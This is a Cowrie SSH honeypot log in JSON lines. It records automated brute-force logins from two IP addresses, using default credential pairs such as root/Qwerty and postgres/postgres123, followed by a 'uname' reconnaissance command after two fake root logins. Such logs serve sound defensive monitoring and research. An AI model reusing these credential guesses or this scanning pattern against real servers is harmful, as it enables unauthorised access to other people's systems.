{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-28T06:44:03.557138Z","src_ip":"212.227.235.229","session":"8b691950c936"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:44:04.811570Z","src_ip":"212.227.235.229","session":"8b691950c936"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55140,"dst_ip":"1.2.3.4","dst_port":22,"session":"29c341d08b55","protocol":"ssh","message":"New connection: 212.227.125.160:55140 (1.2.3.4:22) [session: 29c341d08b55]","sensor":"my-vps","timestamp":"2025-08-28T06:44:12.670383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:44:12.676447Z","src_ip":"212.227.125.160","session":"29c341d08b55"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:44:12.888959Z","src_ip":"212.227.125.160","session":"29c341d08b55"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:44:13.765868Z","src_ip":"212.227.125.160","session":"29c341d08b55"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:44:14.986077Z","src_ip":"212.227.125.160","session":"29c341d08b55"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44344,"dst_ip":"1.2.3.4","dst_port":22,"session":"37d9242f2df0","protocol":"ssh","message":"New connection: 212.227.235.229:44344 (1.2.3.4:22) [session: 37d9242f2df0]","sensor":"my-vps","timestamp":"2025-08-28T06:44:19.108771Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:44:19.109556Z","src_ip":"212.227.235.229","session":"37d9242f2df0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:44:19.360128Z","src_ip":"212.227.235.229","session":"37d9242f2df0"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"postgres123","message":"login attempt [postgres/postgres123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:44:20.113322Z","src_ip":"212.227.235.229","session":"37d9242f2df0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:44:21.366503Z","src_ip":"212.227.235.229","session":"37d9242f2df0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56958,"dst_ip":"1.2.3.4","dst_port":22,"session":"2d87e470882e","protocol":"ssh","message":"New connection: 212.227.125.160:56958 (1.2.3.4:22) [session: 2d87e470882e]","sensor":"my-vps","timestamp":"2025-08-28T06:44:29.017756Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:44:29.019398Z","src_ip":"212.227.125.160","session":"2d87e470882e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:44:29.248147Z","src_ip":"212.227.125.160","session":"2d87e470882e"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-28T06:44:29.930837Z","src_ip":"212.227.125.160","session":"2d87e470882e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:44:31.160117Z","src_ip":"212.227.125.160","session":"2d87e470882e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57746,"dst_ip":"1.2.3.4","dst_port":22,"session":"5307f757e262","protocol":"ssh","message":"New connection: 212.227.235.229:57746 (1.2.3.4:22) [session: 5307f757e262]","sensor":"my-vps","timestamp":"2025-08-28T06:44:35.687901Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:44:35.688717Z","src_ip":"212.227.235.229","session":"5307f757e262"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:44:35.935781Z","src_ip":"212.227.235.229","session":"5307f757e262"}
{"eventid":"cowrie.login.failed","username":"ts","password":"ts","message":"login attempt [ts/ts] failed","sensor":"my-vps","timestamp":"2025-08-28T06:44:36.679162Z","src_ip":"212.227.235.229","session":"5307f757e262"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:44:37.928950Z","src_ip":"212.227.235.229","session":"5307f757e262"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45514,"dst_ip":"1.2.3.4","dst_port":22,"session":"55af37b2fe9e","protocol":"ssh","message":"New connection: 212.227.125.160:45514 (1.2.3.4:22) [session: 55af37b2fe9e]","sensor":"my-vps","timestamp":"2025-08-28T06:44:46.075666Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:44:46.082002Z","src_ip":"212.227.125.160","session":"55af37b2fe9e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:44:46.301487Z","src_ip":"212.227.125.160","session":"55af37b2fe9e"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:44:47.452491Z","src_ip":"212.227.125.160","session":"55af37b2fe9e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:44:47.977960Z","src_ip":"212.227.125.160","session":"55af37b2fe9e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:44:47.978812Z","src_ip":"212.227.125.160","session":"55af37b2fe9e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:44:48.203125Z","src_ip":"212.227.125.160","session":"55af37b2fe9e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:44:48.204147Z","src_ip":"212.227.125.160","session":"55af37b2fe9e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57804,"dst_ip":"1.2.3.4","dst_port":22,"session":"9154d3fd0fdb","protocol":"ssh","message":"New connection: 212.227.235.229:57804 (1.2.3.4:22) [session: 9154d3fd0fdb]","sensor":"my-vps","timestamp":"2025-08-28T06:44:52.731353Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:44:52.732597Z","src_ip":"212.227.235.229","session":"9154d3fd0fdb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:44:52.982913Z","src_ip":"212.227.235.229","session":"9154d3fd0fdb"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty","message":"login attempt [root/Qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:44:53.736125Z","src_ip":"212.227.235.229","session":"9154d3fd0fdb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:44:54.329671Z","src_ip":"212.227.235.229","session":"9154d3fd0fdb"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:44:54.330569Z","src_ip":"212.227.235.229","session":"9154d3fd0fdb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:44:54.582629Z","src_ip":"212.227.235.229","session":"9154d3fd0fdb"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:44:54.583918Z","src_ip":"212.227.235.229","session":"9154d3fd0fdb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59642,"dst_ip":"1.2.3.4","dst_port":22,"session":"50e252d5d5ef","protocol":"ssh","message":"New connection: 212.227.125.160:59642 (1.2.3.4:22) [session: 50e252d5d5ef]","sensor":"my-vps","timestamp":"2025-08-28T06:45:02.608278Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:45:02.609169Z","src_ip":"212.227.125.160","session":"50e252d5d5ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:45:02.840717Z","src_ip":"212.227.125.160","session":"50e252d5d5ef"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:45:03.523788Z","src_ip":"212.227.125.160","session":"50e252d5d5ef"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:45:04.753762Z","src_ip":"212.227.125.160","session":"50e252d5d5ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39632,"dst_ip":"1.2.3.4","dst_port":22,"session":"d46b857c9f5b","protocol":"ssh","message":"New connection: 212.227.235.229:39632 (1.2.3.4:22) [session: d46b857c9f5b]","sensor":"my-vps","timestamp":"2025-08-28T06:45:09.253950Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:45:09.255354Z","src_ip":"212.227.235.229","session":"d46b857c9f5b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:45:09.504226Z","src_ip":"212.227.235.229","session":"d46b857c9f5b"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"abc123","message":"login attempt [ftpuser/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:45:10.505784Z","src_ip":"212.227.235.229","session":"d46b857c9f5b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:45:11.758215Z","src_ip":"212.227.235.229","session":"d46b857c9f5b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54560,"dst_ip":"1.2.3.4","dst_port":22,"session":"2579aa310a42","protocol":"ssh","message":"New connection: 212.227.125.160:54560 (1.2.3.4:22) [session: 2579aa310a42]","sensor":"my-vps","timestamp":"2025-08-28T06:45:19.210285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:45:19.211178Z","src_ip":"212.227.125.160","session":"2579aa310a42"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:45:19.433788Z","src_ip":"212.227.125.160","session":"2579aa310a42"}
{"eventid":"cowrie.login.failed","username":"test","password":"test","message":"login attempt [test/test] failed","sensor":"my-vps","timestamp":"2025-08-28T06:45:20.104769Z","src_ip":"212.227.125.160","session":"2579aa310a42"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:45:21.330758Z","src_ip":"212.227.125.160","session":"2579aa310a42"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54904,"dst_ip":"1.2.3.4","dst_port":22,"session":"339e11647cdb","protocol":"ssh","message":"New connection: 212.227.235.229:54904 (1.2.3.4:22) [session: 339e11647cdb]","sensor":"my-vps","timestamp":"2025-08-28T06:45:25.875738Z"}
